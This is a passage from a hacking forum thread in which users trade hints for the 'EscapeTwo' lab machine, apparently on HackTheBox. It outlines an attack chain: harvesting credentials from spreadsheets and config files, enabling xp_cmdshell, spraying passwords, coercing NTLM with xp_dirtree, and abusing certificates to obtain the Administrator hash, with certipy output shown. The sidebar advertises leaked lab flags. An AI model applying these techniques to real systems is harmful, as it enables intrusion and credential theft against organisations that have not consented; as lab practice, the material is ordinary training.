EscapeTwo
by nt0wl - Wednesday January 8, 2025 at 12:13 AM
#21
(Jan 12, 2025, 12:18 AM)0xbeef Wrote:
(Jan 11, 2025, 08:22 PM)macavitysworld Wrote: - xlsx files
- get creds
- worksfor mssqlclient.py
- enable xp_cmdshell
- enumerate and find creds in config
- esc2 for privesc

Being trying that ESC2 privesc no luck. Any more deets ?

Youll have to make sure Ryan has the correct privs to over write the password. Look at Bloodhound it will show you the path when you click on the relationship between Ryan and the CA account.
Reply
#22
(Jan 12, 2025, 01:52 AM)bkbk Wrote:
(Jan 12, 2025, 12:18 AM)0xbeef Wrote:
(Jan 11, 2025, 08:22 PM)macavitysworld Wrote: - xlsx files
- get creds
- worksfor mssqlclient.py
- enable xp_cmdshell
- enumerate and find creds in config
- esc2 for privesc

Being trying that ESC2 privesc no luck. Any more deets ?

Youll have to make sure Ryan has the correct privs to over write the password. Look at Bloodhound it will show you the path when you click on the relationship between Ryan and the CA account.

got it thanks !

This forum account is currently banned. Ban Length: Permanent (N/A Remaining)
Ban Reason: Leeching.
Reply
#23
(Jan 11, 2025, 10:21 PM)hollb_geek Wrote: The xlsx files are corrupted on my side when I try to open them, is it the same for anyone else ?

You can use Jumpshare to open them online as well.
Reply
#24
(Jan 12, 2025, 04:22 AM)0xbeef Wrote:
(Jan 12, 2025, 01:52 AM)bkbk Wrote:
(Jan 12, 2025, 12:18 AM)0xbeef Wrote:
(Jan 11, 2025, 08:22 PM)macavitysworld Wrote: - xlsx files
- get creds
- worksfor mssqlclient.py
- enable xp_cmdshell
- enumerate and find creds in config
- esc2 for privesc

Being trying that ESC2 privesc no luck. Any more deets ?

Youll have to make sure Ryan has the correct privs to over write the password. Look at Bloodhound it will show you the path when you click on the relationship between Ryan and the CA account.

got it thanks !



im stuck on Ryan i have bloodhound up but cant seem to find a place to write
Reply
#25
how to find xlsx files ?
Reply
#26
└─$ certipy-ad auth -pfx administrator_dc01.pfx -dc-ip ${ip}

Certipy v4.8.2 - by Oliver Lyak (ly4k)

[*] Found multiple identifications in certificate
[*] Please select one:
[0] UPN: 'Administrator@sequel.htb'
[1] DNS Host Name: 'dc01.sequel.htb'
> 0
[*] Using principal: administrator@sequel.htb
[*] Trying to get TGT...
[*] Got TGT
[*] Saved credential cache to 'administrator.ccache'
[*] Trying to retrieve NT hash for 'administrator'
[*] Got hash for 'administrator@sequel.htb': aad3b435b51404eeaad3b435b51404ee:*********


i finally got it omg

thank you for everyone that contributed much is appreciated
Reply
#27
(Jan 12, 2025, 07:22 AM)who4mi Wrote: how to find xlsx files ?

use smbclient to look at shares using the creds given.
(You can also use spider module of cme to get a list of files.)

(Jan 11, 2025, 11:04 PM)flast94711 Wrote:
(Jan 11, 2025, 10:54 PM)Zer0Gr2vity Wrote:
(Jan 11, 2025, 08:22 PM)macavitysworld Wrote: - xlsx files
- get creds
- worksfor mssqlclient.py
- enable xp_cmdshell
- enumerate and find creds in config
- esc2 for privesc

im not trying to enumarting as sql_svc im really confused how can i fidn ryan credentiel

Ryan's creds are located inside the sql-Configuration.INI file. The password is the same as the sql_svc account.

Where can I find "sql-Configuration.INI file". Have creds for a user, other than rose, but cannot find ryan anywhere.
Reply
#28
(Jan 12, 2025, 01:25 PM)travellerswimmer Wrote:
(Jan 12, 2025, 07:22 AM)who4mi Wrote: how to find xlsx files ?

use smbclient to look at shares using the creds given.
(You can also use spider module of cme to get a list of files.)

(Jan 11, 2025, 11:04 PM)flast94711 Wrote:
(Jan 11, 2025, 10:54 PM)Zer0Gr2vity Wrote:
(Jan 11, 2025, 08:22 PM)macavitysworld Wrote: - xlsx files
- get creds
- worksfor mssqlclient.py
- enable xp_cmdshell
- enumerate and find creds in config
- esc2 for privesc

im not trying to enumarting as sql_svc im really confused how can i fidn ryan credentiel

Ryan's creds are located inside the sql-Configuration.INI file. The password is the same as the sql_svc account.

Where can I find "sql-Configuration.INI file". Have creds for a user, other than rose, but cannot find ryan anywhere.

Rule of thumb is always to spray all the passwords found against list of users Smile
Reply
#29
(Jan 11, 2025, 08:22 PM)macavitysworld Wrote: - xlsx files
- get creds
- worksfor mssqlclient.py
- enable xp_cmdshell
- enumerate and find creds in config
- esc2 for privesc

help, pls, im stucked at EXEC xp_dirtree "\\my-ip\share", have responder. NTLM requested to it. But john/hashcat with rockyou.txt have no crack
Reply
#30
(Jan 12, 2025, 01:54 PM)greenfire Wrote:
(Jan 12, 2025, 01:25 PM)travellerswimmer Wrote:
(Jan 12, 2025, 07:22 AM)who4mi Wrote: how to find xlsx files ?

use smbclient to look at shares using the creds given.
(You can also use spider module of cme to get a list of files.)

(Jan 11, 2025, 11:04 PM)flast94711 Wrote:
(Jan 11, 2025, 10:54 PM)Zer0Gr2vity Wrote:
(Jan 11, 2025, 08:22 PM)macavitysworld Wrote: - xlsx files
- get creds
- worksfor mssqlclient.py
- enable xp_cmdshell
- enumerate and find creds in config
- esc2 for privesc

im not trying to enumarting as sql_svc im really confused how can i fidn ryan credentiel

Ryan's creds are located inside the sql-Configuration.INI file. The password is the same as the sql_svc account.

Where can I find "sql-Configuration.INI file". Have creds for a user, other than rose, but cannot find ryan anywhere.

Rule of thumb is always to spray all the passwords found against list of users Smile

yeap, enum works for it. got ryan
Reply


Possibly Related Threads…
Thread Author Replies Views Last Post
  [FREE] CPTS 12 FLAGS pulsebreaker 73 2,317 2 hours ago
Last Post: louikizzz
  [MEGALEAK] HackTheBox ProLabs, Fortress, Endgame - Alchemy, 250 Flags, leak htb-bot htb-bot 89 8,091 2 hours ago
Last Post: Xploitd
Heart [FREE] HackTheBox All Cheatsheets Tamarisk 10 621 5 hours ago
Last Post: chufoni
  [FREE] HackTheBox Academy - CBBH CDSA CPTS All Modules Flags Techtom 28 2,847 5 hours ago
Last Post: chufoni
  [FREE] 300+ Writeups PDF HackTheBox/HTB premium retired Tamarisk 375 93,589 6 hours ago
Last Post: Johe

Forum Jump:


 Users browsing this forum: 1 Guest(s)